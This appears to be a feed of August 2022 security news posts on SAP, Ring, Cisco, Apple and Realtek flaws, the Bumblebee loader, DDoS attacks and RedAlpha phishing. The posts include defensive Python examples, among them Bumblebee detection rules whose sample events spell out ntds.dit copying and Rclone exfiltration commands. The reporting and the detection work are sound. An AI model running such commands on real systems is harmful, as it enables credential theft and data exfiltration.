CISA added SAP flaw to its Known Exploited Vulnerabilities Catalog
By Pierluigi Paganini (SecurityAffairs – hacking, SAP), 8/19/22 9:44am

US CISA added a critical SAP flaw to its Known Exploited Vulnerabilities Catalog after its details were disclosed at the Black Hat and Def Con conferences.

The US Cybersecurity and Infrastructure Security Agency (CISA) added a critical SAP vulnerability, tracked as CVE-2022-22536, to its Known Exploited Vulnerabilities Catalog a few days after researchers shared details about the issue at the Black Hat and Def Con hacker conferences.

CVE-2022-22536 is a memory pipes (MPI) desynchronization vulnerability named Internet Communication Manager Advanced Desync (ICMAD). The issue was disclosed in February 2022; an unauthenticated remote attacker could exploit it by sending a simple HTTP request to a vulnerable instance and take it over. The flaw received a CVSSv3 score of 10.0.

The US agency warned that this issue could expose organizations to a broad range of attacks, including data theft, financial fraud, disruption of mission-critical business processes, ransomware attacks, and a halt of all operations.

“On February 8, 2022, SAP released security updates to address vulnerabilities affecting multiple products, including critical vulnerabilities affecting SAP applications using SAP Internet Communication Manager (ICM). SAP applications help organizations manage critical business processes—such as enterprise resource planning, product lifecycle management, customer relationship management, and supply chain management.” reads the advisory published by CISA.

In February, security researchers from Onapsis, in coordination with SAP, published a Threat Report that provides technical details about three critical vulnerabilities (CVE-2022-22536, CVE-2022-22532 and CVE-2022-22533) affecting Internet Communication Manager (ICM), a core component of SAP business applications.

“The ICMAD vulnerabilities are particularly critical because the issues exist by default in the SAP Internet Communication Manager (ICM). The ICM is one of the most important components of an SAP NetWeaver application server: It is present in most SAP products and is a critical part of the overall SAP technology stack, connecting SAP applications with the Internet.” reads the Threat Report. “Malicious actors can easily leverage the most critical vulnerability (CVSSv3 10.0) in unprotected systems; the exploit is simple, requires no previous authentication, no preconditions are necessary, and the payload can be sent through HTTP(S), the most widely used network service to access SAP applications.”

Onapsis also released an open-source tool, named “onapsis icmad scanner”, to scan systems for ICMAD vulnerabilities.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. Experts also recommend that private organizations review the Catalog and address the vulnerabilities in their infrastructure.

Last week, Onapsis researcher Martin Doyhenard shared details of the issue at the Black Hat conference (on August 10) and at the Def Con conference (on August 13). The expert presented how to exploit inter-process communication in SAP’s HTTP server.

“This paper will demonstrate how to leverage two memory corruption vulnerabilities found in SAP’s proprietary HTTP Server, using high level protocol exploitation techniques.” reads the research paper published by Onapsis. “Both CVE-2022-22536 and CVE-2022-22532 were remotely exploitable and could be used by unauthenticated attackers to completely compromise any SAP installation on the planet. By escalating an error in the HTTP request handling process, it was possible to desynchronize ICM data buffers and hijack every user’s account with advanced HTTP Smuggling.”

CISA orders federal agencies to fix both issues by September 8, 2022.

[Category: Breaking News, Hacking, Security, CISA, CVE-2022-22536, hacking news, information security news, IT Information Security, Known Exploited Vulnerabilities Catalog, Pierluigi Paganini, SAP, Security Affairs, Security News]

A flaw in Amazon Ring could expose users’ camera recordings
By Pierluigi Paganini (SecurityAffairs – hacking, Amazon Ring), 8/19/22 5:56am

Amazon addressed a high-severity flaw in its Ring app for Android that could have exposed sensitive information and camera recordings.

In May, Amazon fixed a high-severity vulnerability in its Ring app for Android that could have allowed a malicious app installed on a user’s device to access sensitive information and camera recordings.

The Ring app allows users to monitor video feeds from multiple devices, including security cameras, video doorbells, and alarm systems. The Android application has been downloaded over 10 million times.

Researchers from security firm Checkmarx discovered a vulnerability in the com.ringapp/com.ring.nh.deeplink.DeepLinkActivity activity, which was implicitly exported in the Android Manifest and, for this reason, was accessible to other applications on the same device.

“These other applications could be malicious applications that users could be convinced to install.” reads the post published by the researchers. “This activity would accept, load, and execute web content from any server, as long as the Intent’s destination URI contained the string ‘/better-neighborhoods/’.”

The experts also identified a Reflected Cross-Site Scripting (XSS) issue in cyberchef.schlarpc.people.a2z.com, which can be chained with the previous one to install a malicious application on the device.

An attacker can use a rogue app to obtain the user’s Authorization Token, then use it to extract the session cookie by sending this information to the endpoint ring[.]com/mobile/authorize along with the device’s hardware ID.

“This payload redirects the WebView to the malicious web page, which can access the __NATIVE__BRIDGE__.getToken() JavaScript Interface that grants access to an Authorization Token, which can then be exfiltrated to an attacker-controlled server.” continues the post. “This token is a Java Web Token (JWT), which is insufficient to authorize calls to Ring’s multiple APIs. Authorization is enforced using an rs_session cookie. However, this cookie can be obtained by calling the https://ring.com/mobile/authorize endpoint with both a valid Authorization Token plus the corresponding device’s Hardware ID.”

Once the cookie is obtained, the attacker can access the victim’s account and the personal data associated with it (i.e. full name, email address, phone number, and geolocation information).

Below is the timeline for this issue, as published by the experts alongside a video PoC:

1-May-2022: Full findings reported to the Amazon Vulnerability Research Program
1-May-2022: Amazon confirmed receiving the report
27-May-2022: Amazon released a fix to customers in version .51 (3.51.0 Android, 5.51.0 iOS)

“We issued a fix for supported Android customers on May 27, 2022, soon after the researcher’s submission was processed. Based on our review, no customer information was exposed. This issue would be extremely difficult for anyone to exploit, because it requires an unlikely and complex set of circumstances to execute.” Amazon told the experts.
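As an added illustration (not Checkmarx’s code nor the Ring app’s), the Python below contrasts the substring check described above with a scheme/host/path allowlist for deep-link URIs; the allowed host is a hypothetical placeholder and the sample URIs are constructed. The manifest-side fix (not exporting the activity) is a separate change not shown here.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist standing in for the app's own web origin (placeholder,
# not a real Ring host). Compared exactly, after urlsplit normalises case.
ALLOWED_HOSTS = {"neighbors.example.com"}
REQUIRED_PATH_PREFIX = "/better-neighborhoods/"


def weak_accepts(uri: str) -> bool:
    """The flawed check as described in the write-up: the URI is loaded into the
    WebView as soon as the marker string appears *anywhere* in it."""
    return REQUIRED_PATH_PREFIX in uri


def hardened_accepts(uri: str) -> bool:
    """Load only https URIs whose exact host is allowlisted and whose path (not
    query, fragment or userinfo) starts with the expected prefix."""
    try:
        parts = urlsplit(uri)
        host, port = parts.hostname, parts.port   # .port raises on junk ports
    except ValueError:
        return False
    if parts.scheme.lower() != "https":
        return False
    # hostname drops userinfo and port and lowercases, so
    # "https://good.example@evil.example/..." yields "evil.example".
    if host is None or host not in ALLOWED_HOSTS or port not in (None, 443):
        return False
    return parts.path.startswith(REQUIRED_PATH_PREFIX)


# Constructed deep-link URIs with the expected (weak, hardened) verdicts.
SAMPLE_URIS = {
    "https://neighbors.example.com/better-neighborhoods/feed": (True, True),
    "https://NEIGHBORS.example.com/better-neighborhoods/feed": (True, True),
    "https://attacker.example/better-neighborhoods/": (True, False),
    "https://attacker.example/?next=/better-neighborhoods/": (True, False),
    "https://neighbors.example.com@attacker.example/better-neighborhoods/": (True, False),
    "http://neighbors.example.com/better-neighborhoods/feed": (True, False),
    "https://neighbors.example.com/other/better-neighborhoods/": (True, False),
    "https://neighbors.example.com/home": (False, False),
}


def evaluate(uris=SAMPLE_URIS):
    """Return {uri: (weak_verdict, hardened_verdict)} for each URI."""
    return {u: (weak_accepts(u), hardened_accepts(u)) for u in uris}


if __name__ == "__main__":
    for uri, verdict in evaluate().items():
        print(f"{verdict!s:15} {uri}")
```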

[Category: Breaking News, Hacking, Internet of Things, Security, Amazon Ring, hacking news, information security news, IT Information Security, Pierluigi Paganini, Security Affairs, Security News]

Cisco fixes High-Severity bug in Secure Web Appliance
By Pierluigi Paganini (SecurityAffairs – hacking, Cisco), 8/19/22 3:04am

Cisco addressed a high-severity escalation of privilege vulnerability (CVE-2022-20871) in AsyncOS for Cisco Secure Web Appliance.

Cisco Secure Web Appliance (formerly Cisco Web Security Appliance (WSA)) offers protection from malware and web-based attacks and provides application visibility and control.

Cisco has addressed a high-severity escalation of privilege vulnerability, tracked as CVE-2022-20871, that resides in the web management interface of AsyncOS for Cisco Secure Web Appliance. An authenticated, remote attacker can exploit this issue to perform a command injection and elevate privileges to root.

“A vulnerability in the web management interface of Cisco AsyncOS for Cisco Secure Web Appliance, formerly Cisco Web Security Appliance (WSA), could allow an authenticated, remote attacker to perform a command injection and elevate privileges to root.” reads the advisory published by the IT giant. “This vulnerability is due to insufficient validation of user-supplied input for the web interface. An attacker could exploit this vulnerability by authenticating to the system and sending a crafted HTTP packet to the affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system and elevate privileges to root. To successfully exploit this vulnerability, an attacker would need at least read-only credentials.”

The root cause of the flaw is that user-supplied input to the web interface is not sufficiently validated. An attacker can trigger the flaw by authenticating to the system and sending a crafted HTTP packet to the vulnerable device. The vendor pointed out that to successfully exploit this vulnerability, an attacker would need at least read-only credentials.

The company recommends that customers upgrade to an appropriate fixed software release as indicated in the following table.

Cisco AsyncOS for Secure Web Appliance Release    First Fixed Release
Earlier than 12.5                                 Not vulnerable
12.5                                              Release no. TBD (Sep 2022)
14.0                                              Release no. TBD (Aug 2022)
14.5                                              14.5.0-537

At this time, there are no workarounds to address this issue; the good news is that Cisco is not aware of attacks exploiting this vulnerability in the wild.

[Category: Breaking News, Security, CISCO, Hacking, hacking news, IT Information Security, Pierluigi Paganini, Secure Web Appliance, Security Affairs, Security News]

Bumblebee attacks, from initial access to the compromise of Active Directory Services
By Pierluigi Paganini (SecurityAffairs – hacking, malware), 8/19/22 2:33am

Threat actors are using the Bumblebee loader to compromise Active Directory services as part of post-exploitation activities.

The Cybereason Global Security Operations Center (GSOC) Team analyzed a cyberattack that involved the Bumblebee Loader and detailed how the attackers were able to compromise the entire network.

Most Bumblebee infections started with users executing LNK files which use a system binary to load the malware. The malware is distributed through phishing messages using a malicious attachment or a link to the malicious archive containing Bumblebee.

After initial execution, Bumblebee was used to perform post-exploitation activities, including privilege escalation, reconnaissance, and credential theft. Threat actors conduct intensive reconnaissance activities and redirect the output of executed commands to files for exfiltration.

Bumblebee has been active since March 2022, when it was spotted by Google’s Threat Analysis Group (TAG); experts noticed that cybercriminal groups that were previously using BazaLoader and IcedID as part of their malware campaigns switched to the Bumblebee loader.

“Cybereason GSOC has observed threat actors transitioning from BazarLoader, Trickbot, and IcedID to Bumblebee, which seems to be in active development and generally the loader of choice for many threat actors.” reads the analysis published by Cybereason.

Bumblebee operators use the Cobalt Strike framework throughout the attack. The threat actors use the obtained credentials to access Active Directory and make a copy of ntds.dit, which contains data for the entire Active Directory. Lastly, a domain administrator account is used to move laterally, create local user accounts, and exfiltrate data using Rclone software.

In the attack analyzed by Cybereason, threat actors used the stolen credentials of a highly privileged user to gain access to Active Directory and compromise the target network.

“Bumblebee accesses the remote Active Directory machines using Windows Management Instrumentation command-line utility (WMIC) and creates a shadow copy using vssadmin command. In addition, the attacker steals the ntds.dit file from the domain controller. The ntds.dit file is a database that stores Active Directory data, including information about user objects, groups and group membership. The file also stores the password hashes for all users in the domain.” continues the analysis.

The experts noticed that the time between initial access and Active Directory compromise was less than two days.

GSOC experts warn that attacks involving Bumblebee must be treated as critical. The attack chain they analyzed allows threat actors to deliver their ransomware into the compromised networks.
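As an added example (not Cybereason’s code or telemetry), the Python below turns the behaviours described above (WMIC to the domain controller, vssadmin shadow copy, ntds.dit theft, Rclone, recon output redirected to files) into simple command-line detection rules and correlates the shadow-copy and ntds.dit events per host; the event fields, hostnames and command lines are constructed for the illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Behaviours from the Cybereason analysis, expressed as command-line patterns.
RULES = [
    ("wmic_remote_exec", "medium", re.compile(r"\bwmic(\.exe)?\b.*/node:", re.I)),
    ("vssadmin_shadow", "high", re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\s+shadow\b", re.I)),
    ("ntds_dit_access", "high", re.compile(r"\bntds\.dit\b", re.I)),
    ("rclone_exfil", "high", re.compile(r"\brclone(\.exe)?\b", re.I)),
    ("recon_to_file", "low",
     re.compile(r"\b(net|nltest|ipconfig|whoami|systeminfo)(\.exe)?\b.*>\s*\S+\.txt", re.I)),
]


def match_rules(event):
    """Return [(rule_name, severity), ...] for every rule hitting the command line."""
    return [(name, sev) for name, sev, rx in RULES if rx.search(event["command_line"])]


def detect(events):
    """Flat list of (event_index, rule_name, severity) over a batch of events."""
    return [(i, name, sev) for i, ev in enumerate(events) for name, sev in match_rules(ev)]


def correlate_ad_theft(events, window_minutes=30):
    """Hosts on which a shadow copy was created *and* ntds.dit was touched within
    `window_minutes` of each other: the pairing the analysis describes on the
    domain controller. A shadow copy alone (e.g. a backup job) is not enough."""
    seen = defaultdict(lambda: {"vssadmin_shadow": [], "ntds_dit_access": []})
    for ev in events:
        for name, _ in match_rules(ev):
            if name in seen[ev["host"]]:
                seen[ev["host"]][name].append(ev["ts"])
    window = timedelta(minutes=window_minutes)
    return sorted(
        host for host, t in seen.items()
        if any(abs(t2 - t1) <= window
               for t1 in t["vssadmin_shadow"] for t2 in t["ntds_dit_access"])
    )


T0 = datetime(2022, 8, 1, 9, 0)
# Constructed process-creation events (Sysmon-like fields), not real telemetry.
EVENTS = [
    {"ts": T0, "host": "WS-014", "user": "CORP\\jdoe", "image": "cmd.exe",
     "command_line": 'cmd.exe /c net group "domain admins" /domain > C:\\Users\\Public\\da.txt'},
    {"ts": T0 + timedelta(minutes=2), "host": "WS-014", "user": "CORP\\jdoe", "image": "wmic.exe",
     "command_line": 'wmic.exe /node:DC01 process call create "cmd.exe /c vssadmin create shadow /for=C:"'},
    {"ts": T0 + timedelta(minutes=3), "host": "DC01", "user": "CORP\\jdoe", "image": "cmd.exe",
     "command_line": "cmd.exe /c vssadmin create shadow /for=C:"},
    {"ts": T0 + timedelta(minutes=5), "host": "DC01", "user": "CORP\\jdoe", "image": "cmd.exe",
     "command_line": "cmd.exe /c copy C:\\Windows\\NTDS\\ntds.dit C:\\Windows\\Temp\\n.dit"},
    {"ts": T0 + timedelta(hours=2), "host": "DC01", "user": "CORP\\jdoe", "image": "rclone.exe",
     "command_line": "rclone.exe copy C:\\Windows\\Temp remote:share"},
    # A scheduled backup on a file server: shadow copy without ntds.dit access.
    {"ts": T0 + timedelta(hours=3), "host": "FS02", "user": "NT AUTHORITY\\SYSTEM",
     "image": "vssadmin.exe", "command_line": "vssadmin.exe create shadow /for=D:"},
]

if __name__ == "__main__":
    for idx, rule, sev in detect(EVENTS):
        print(f"[{sev:6}] event {idx} on {EVENTS[idx]['host']}: {rule}")
    print("AD credential theft suspected on:", correlate_ad_theft(EVENTS))  # ['DC01']
```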

[Category: Breaking News, Malware, Security, bumblebee, Cybercrime, Hacking, hacking news, information security news, IT Information Security, loader, malware, Pierluigi Paganini, Security Affairs, Security News]

Estonia blocked cyberattacks claimed by Pro-Russia Killnet group
By Pierluigi Paganini (SecurityAffairs – hacking, Estonia), 8/19/22 1:05am

Estonia announced that it has blocked a wave of cyber attacks conducted by Russian hackers against local institutions.

Undersecretary for Digital Transformation Luukas Ilves announced that Estonia was hit by the most extensive wave of DDoS attacks it has faced since 2007. The DDoS attacks targeted both public institutions and the private sector. The pro-Russia hacker group Killnet claimed responsibility for the attacks.

Ilves confirmed that Estonian cyber units were able to block the attacks; e-Estonia services were not disrupted. e-Estonia refers to a movement by the government of Estonia to facilitate citizen interactions with the state through the use of electronic solutions. E-services created under this initiative include i-Voting, e-Tax Board, e-Business, e-Banking, e-Ticket, e-School, University via internet, the E-Governance Academy, as well as the release of several mobile applications.

“Yesterday, Estonia was subject to the most extensive cyber attacks it has faced since 2007. Attempted DDoS attacks targeted both public institutions and the private sector. (1/4) @e_estonia” — Luukas Ilves (@luukasilves) August 18, 2022

“Kudos to the teams working to keep the lights on @e_estonia, notably @e_riik, @zone_ee, RMIT and all the partners supporting them. (3/4)” — Luukas Ilves (@luukasilves) August 18, 2022

The head of Estonia’s computer emergency response team, Tonu Tammer, told AFP that the attacks hit the websites of local authorities, including the police and the government. The attackers also hit a logistics firm.

The Killnet group declared that it hit Estonia in retaliation for the Baltic state’s removal of a Soviet-era World War II memorial this week.

“The Baltic state had decided to take down the Soviet T-34 tank from a pedestal in Narva, a border city with a large Russian-speaking minority, and transfer it to the Estonian War Museum.” reported the AFP agency. The government had accused Russia of using such monuments to stir up tensions.

The Killnet group has been active since March; it launched DDoS attacks against governments that expressed support for Ukraine, including Italy, Romania, Moldova, the Czech Republic, Lithuania, Norway, and Latvia.

[Category: Breaking News, Cyber warfare, Hacking, Estonia, hacking news, information security news, IT Information Security, KillNet, Pierluigi Paganini, Russia, Security Affairs, Security News]

Safari 15.6.1 addresses a zero-day flaw actively exploited in the wild
By Pierluigi Paganini (SecurityAffairs – hacking, Safari), 8/18/22 4:37pm

Apple released Safari 15.6.1 for macOS Big Sur and Catalina to address a zero-day vulnerability actively exploited in the wild.

Safari 15.6.1 for macOS Big Sur and Catalina addressed an actively exploited zero-day vulnerability tracked as CVE-2022-32893. The flaw is an out-of-bounds write issue in WebKit, and the IT giant fixed it with improved bounds checking. The exploitation of this vulnerability may lead to arbitrary code execution.

According to the advisory, threat actors could exploit the flaw by tricking victims into visiting maliciously crafted web content. Apple confirmed that this issue may have been actively exploited by threat actors in the wild, but it did not provide details about the attacks.

“Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.” reads the advisory.

The vulnerability was reported by an anonymous researcher.

Yesterday, Apple also addressed the same issue for macOS Monterey and iPhones/iPads. The vulnerability has been fixed with the release of iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1. The iOS and iPadOS updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

Apple has addressed six other zero-day vulnerabilities since January; below is the list of fixed issues:

January 2022: CVE-2022-22587 and CVE-2022-22594.
February 2022: CVE-2022-22620.
March 2022: CVE-2022-22674 and CVE-2022-22675.
May 2022: CVE-2022-22675

[Category: Breaking News, Hacking, Security, Apple, hacking news, information security news, IT Information Security, Safari, Security News]

Google blocked the largest Layer 7 DDoS reported to date
By Pierluigi Paganini (SecurityAffairs – hacking, HTTPS DDoS), 8/18/22 11:57am

Google announced that it has blocked the largest ever HTTPS DDoS attack, which reached 46 million requests per second (RPS).

Google announced that it has blocked the largest ever HTTPS DDoS attack, which hit one of its Cloud Armor customers. The IT giant revealed that the attack reached 46 million requests per second (RPS).

The attack took place on June 1st, at 09:45; it started with more than 10,000 requests per second (rps) and targeted a customer’s HTTP/S Load Balancer. Eight minutes later, the attack grew to 100,000 requests per second, and two minutes later it reached 46 million RPS. The DDoS attack lasted 69 minutes.

The company pointed out that the volume of requests per second is at least 76% more than the previous record, which was blocked by Cloudflare in June and reached 26 million RPS.

“This is the largest Layer 7 DDoS reported to date—at least 76% larger than the previously reported record. To give a sense of the scale of the attack, that is like receiving all the daily requests to Wikipedia (one of the top 10 trafficked websites in the world) in just 10 seconds.” reported Google.

The experts reported that the attack originated from 5,256 source IPs in 132 countries; the top 4 countries contributed approximately 31% of the total attack traffic. Approximately 22% (1,169) of the source IPs corresponded to Tor exit nodes, but the experts pointed out that the request volume coming from those nodes represented just 3% of the attack traffic.

“While we believe Tor participation in the attack was incidental due to the nature of the vulnerable services, even at 3% of the peak (greater than 1.3 million rps) our analysis shows that Tor exit-nodes can send a significant amount of unwelcome traffic to web applications and services.” continues the report.

The geographic distribution and types of unsecured services that were involved in the attack suggest it was launched by a Mēris botnet.

The attack was stopped at the edge of Google’s network, with the malicious requests blocked upstream from the customer’s application.

“Before the attack started, the customer had already configured Adaptive Protection in their relevant Cloud Armor security policy to learn and establish a baseline model of the normal traffic patterns for their service.” conclude the experts. “As a result, Adaptive Protection was able to detect the DDoS attack early in its life cycle, analyze its incoming traffic, and generate an alert with a recommended protective rule–all before the attack ramped up. The customer acted on the alert by deploying the recommended rule leveraging Cloud Armor’s recently launched rate limiting capability to throttle the attack traffic.”

Another Cloudflare customer was hit with a DDoS attack reaching 26 million RPS.

[Category: Breaking News, Hacking, Security, hacking news, information security news, IT Information Security, Pierluigi Paganini, Security Affairs, Security News]

BlackByte ransomware v2 is out with new extortion novelties
By Pierluigi Paganini (SecurityAffairs – hacking, Blackbyte), 8/18/22 9:24am

A new version of the BlackByte ransomware appeared in the threat landscape; version 2.0 uses extortion techniques similar to LockBit’s.

BlackByte ransomware version 2.0 appeared in the threat landscape after a short break; the latest version has a new data leak site. It is interesting to note that the group introduced some novelties in its extortion strategy. The gang allows victims to pay $5,000 to postpone the leaking of their data by 24 hours, download the data for $200,000, or destroy all the data by paying a $300,000 ransom. The prices are not fixed and could vary depending on the importance of the victim.

Researchers from threat intelligence firm KELA noticed that the new BlackByte leak site lacks wallet addresses, which means that victims cannot pay the ransom.

The BlackByte ransomware operation has been active since September 2021; in October 2021 researchers from Trustwave’s SpiderLabs released a decryptor that can allow victims of early versions of BlackByte ransomware to restore their files for free.

In February, the US Federal Bureau of Investigation (FBI) revealed that the BlackByte ransomware gang had breached at least three organizations from US critical infrastructure sectors.

In 2021, a flaw in the operation was found that allowed a free BlackByte decryptor to be created. Unfortunately, after the weakness was reported, the threat actors fixed the flaw.

[Category: Breaking News, Cyber Crime, Malware, Cybercrime, Hacking, hacking news, information security news, IT Information Security, malware, Pierluigi Paganini, ransomware, Security Affairs, Security News]

Apple fixed two new zero-day flaws exploited by threat actors
By Pierluigi Paganini (SecurityAffairs – hacking, Apple), 8/18/22 2:36am

Apple addressed two zero-day vulnerabilities, exploited by threat actors, affecting iOS, iPadOS, and macOS devices.

Apple this week released security updates for the iOS, iPadOS, and macOS platforms to address two zero-day vulnerabilities exploited by threat actors. Apple did not share details about these attacks.

The two flaws are:

CVE-2022-32893: An out-of-bounds issue in WebKit. An attacker can trigger the flaw by tricking target devices into processing maliciously crafted web content to achieve arbitrary code execution. “Apple is aware of a report that this issue may have been actively exploited.”

CVE-2022-32894: An out-of-bounds issue in the OS Kernel that could be exploited by a malicious application to execute arbitrary code with the highest privileges.

The vulnerabilities have been fixed with the release of iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1. The iOS and iPadOS updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). The IT giant solved both vulnerabilities with improved bounds checking.

Apple has addressed six other zero-day vulnerabilities since January; below is the list of fixed issues:

January 2022: CVE-2022-22587 and CVE-2022-22594.
February 2022: CVE-2022-22620.
March 2022: CVE-2022-22674 and CVE-2022-22675.
May 2022: CVE-2022-22675

[Category: Breaking News, Hacking, Mobile, Security, Apple, hacking news, information security news, Security News, zero-Day]

PoC exploit code for critical Realtek RCE flaw released online
By Pierluigi Paganini (SecurityAffairs – hacking, Realtek), 8/18/22 1:10am

Exploit code for a critical vulnerability affecting networking devices using the Realtek RTL819x system on a chip was released online.

PoC exploit code for a critical stack-based buffer overflow issue, tracked as CVE-2022-27255 (CVSS 9.8), affecting networking devices using Realtek’s RTL819x system on a chip was released online. The issue resides in Realtek’s SDK for the open-source eCos operating system; it was discovered by researchers from cybersecurity firm Faraday Security.

“On Realtek eCos SDK-based routers, the ‘SIP ALG’ module is vulnerable to buffer overflow. The root cause of the vulnerability is insufficient validation on the received buffer, and unsafe calls to strcpy. The ‘SIP ALG’ module calls strcpy to copy some contents of SIP packets to a predefined fixed buffer and does not check the length of the copied contents.” reads the advisory published by Realtek, which disclosed the issue in March 2022. “A remote attacker can exploit the vulnerability through a WAN interface by crafting arguments in SDP data or the SIP header to make a specific SIP packet, and the successful exploitation would cause a crash or achieve the remote code execution.”

Millions of devices, including routers and access points, are exposed to hacking.

The experts (Octavio Gianatiempo, Octavio Galland, Emilio Couto, Javier Aguinaga) disclosed technical details of the flaw at the DEFCON hacker conference last week. A remote attacker can exploit the flaw to execute arbitrary code without authentication by sending specially crafted SIP packets with malicious SDP data to the vulnerable devices. The issue is very dangerous because exploitation doesn’t require user interaction.

The PoC code developed by the experts works against Nexxt Nebula 300 Plus routers.

“This repository contains the materials for the talk ‘Exploring the hidden attack surface of OEM IoT devices: pwning thousands of routers with a vulnerability in Realtek’s SDK for eCos OS.’, which was presented at DEFCON30.” reads the description provided with the exploit code on GitHub.

The repo includes:

analysis: Automated firmware analysis to detect the presence of CVE-2022-27255 (Run analyse_firmware.py).
exploits_nexxt: PoC and exploit code. The PoC should work on every affected router, however the exploit code is specific to the Nexxt Nebula 300 Plus router.
ghidra_scripts: Vulnerable function call searching script and CVE-2022-27255 detection script.
DEFCON: Slide deck & poc video.

Johannes Ullrich, Dean of Research at SANS, shared a Snort rule that can be used to detect PoC exploit attempts.

“The rule looks for INVITE messages that contain the string m=audio . It triggers if there are more than 128 bytes following the string (128 bytes is the size of the buffer allocated by the Realtek SDK) and if none of those bytes is a carriage return. The rule may even work sufficiently well without the last content match. Let me know if you see any errors or improvements.” wrote the expert.

Slides for the DEFCON presentation, along with exploits and a detection script for CVE-2022-27255, are available in this GitHub repository.
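The rule logic Ullrich describes, re-implemented in Python as an added example so it can be exercised offline against constructed SIP messages; this is neither the Snort rule itself nor Faraday Security’s code, and the INVITE samples are made up (the over-long one is just a long m=audio field, not an exploit payload).

```python
"""Offline re-implementation of the detection logic described for the Snort
rule: a SIP INVITE whose SDP contains "m=audio " followed by more than 128
bytes without a carriage return.  128 is the fixed buffer size the Realtek
SDK's SIP ALG copies into with strcpy, per the advisory quoted above."""

REALTEK_SIP_ALG_BUFFER = 128   # fixed buffer size quoted in the advisory
NEEDLE = b"m=audio "           # SDP media line the rule keys on


def sdp_audio_line_overflows(payload: bytes) -> bool:
    """True when `payload` matches the rule logic as described.

    The message must be a SIP INVITE, must contain NEEDLE, and the
    (REALTEK_SIP_ALG_BUFFER + 1) bytes after the needle must all be present
    and contain no carriage return (0x0d), i.e. the m=audio line runs past
    what the 128-byte buffer can hold before the line terminator."""
    if not payload.startswith(b"INVITE "):
        return False
    idx = payload.find(NEEDLE)
    if idx == -1:
        return False
    start = idx + len(NEEDLE)
    window = payload[start:start + REALTEK_SIP_ALG_BUFFER + 1]
    if len(window) < REALTEK_SIP_ALG_BUFFER + 1:
        return False               # too short to overrun the buffer
    return b"\r" not in window


def scan_sip_messages(messages):
    """Indexes of the messages that trigger the check."""
    return [i for i, m in enumerate(messages) if sdp_audio_line_overflows(m)]


def invite_with_sdp(sdp_body: bytes) -> bytes:
    """Build a minimal, constructed SIP INVITE carrying `sdp_body` (test data)."""
    head = (
        b"INVITE sip:bob@example.test SIP/2.0\r\n"
        b"Via: SIP/2.0/UDP 192.0.2.10:5060\r\n"
        b"Content-Type: application/sdp\r\n"
    )
    return head + b"Content-Length: %d\r\n\r\n" % len(sdp_body) + sdp_body


# Constructed samples (not captured traffic).
BENIGN_INVITE = invite_with_sdp(
    b"v=0\r\n"
    b"o=alice 2890844526 2890844526 IN IP4 192.0.2.10\r\n"
    b"m=audio 49170 RTP/AVP 0\r\n"
)
# m=audio field far longer than the 128-byte buffer, no CR inside it.
OVERLONG_INVITE = invite_with_sdp(b"v=0\r\n" + b"m=audio " + b"9" * 200 + b"\r\n")
# Long message overall, but a CR appears within the first 129 bytes: no alert.
LONG_BUT_TERMINATED = invite_with_sdp(
    b"v=0\r\n" + b"m=audio " + b"9" * 100 + b"\r\n" + b"a=" + b"x" * 200 + b"\r\n"
)
# Same over-long SDP in a non-INVITE request: the rule only looks at INVITEs.
OPTIONS_REQUEST = b"OPTIONS sip:bob@example.test SIP/2.0\r\n\r\n" + b"m=audio " + b"9" * 200

if __name__ == "__main__":
    samples = [BENIGN_INVITE, OVERLONG_INVITE, LONG_BUT_TERMINATED, OPTIONS_REQUEST]
    print(scan_sip_messages(samples))  # [1]
```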

[Category: Breaking News, Hacking, hacking news, information security news, IT Information Security, POC code, RCE, Realtek, Security Affairs, Security News]

[*] [+] [-] [x] [A+] [a-]  
[l] at 8/17/22 4:58pm
A China-linked APT group named RedAlpha is behind a long-running mass credential theft campaign aimed at organizations worldwide. Recorded Future researchers attributed a long-running mass credential theft campaign to a Chinese nation-state actor tracked as RedAlpha. The campaign targeted global humanitarian, think tank, and government organizations. Experts believe RedAlpha is a group of contractors conducting cyber-espionage activity on behalf of China. Recorded Future identified a link between RedAlpha and a Chinese information security company whose name appears in the registration of multiple RedAlpha domains. The company, called “Nanjing Qinglan Information Technology Co., Ltd.”, is now known as “Jiangsu Cimer Information Security Technology Co. Ltd.”

“In this activity, RedAlpha very likely sought to gain access to email accounts and other online communications of targeted individuals and organizations.” reads the report published by Recorded Future. “RedAlpha’s humanitarian and human rights-linked targeting and spoofing of organizations such as Amnesty International and FIDH is particularly concerning given the CCP’s reported human rights abuses in relation to Uyghurs, Tibetans, and other ethnic and religious minority groups in China.”

Since 2019, RedAlpha has been registering and weaponizing hundreds of domains spoofing organizations such as the International Federation for Human Rights (FIDH), Amnesty International, the Mercator Institute for China Studies (MERICS), Radio Free Asia (RFA), the American Institute in Taiwan (AIT), and other global government, think tank, and humanitarian organizations. Experts also noticed that the attackers used domains spoofing major email and storage service providers such as Yahoo (135 typosquat domains), Google (91 typosquat domains), and Microsoft (70 typosquat domains). In some cases the domains hosted fake login pages for popular email providers such as Outlook and Zimbra.

The attackers sent out phishing messages leading victims to phishing pages posing as legitimate email login portals. Experts believe the attackers target individuals affiliated with the above organizations rather than imitating these organizations to target other third parties. The attack vector is phishing emails containing PDF files that embed malicious links pointing to the phishing login pages.

“RedAlpha’s activity has expanded over the past several years to include credential-phishing campaigns spoofing ministries of foreign affairs in multiple countries.” continues the report. “We observed phishing pages imitating webmail login portals for Taiwan and Portugal’s MOFAs, as well as multiple domains spoofing Brazil and Vietnam’s MOFAs.”

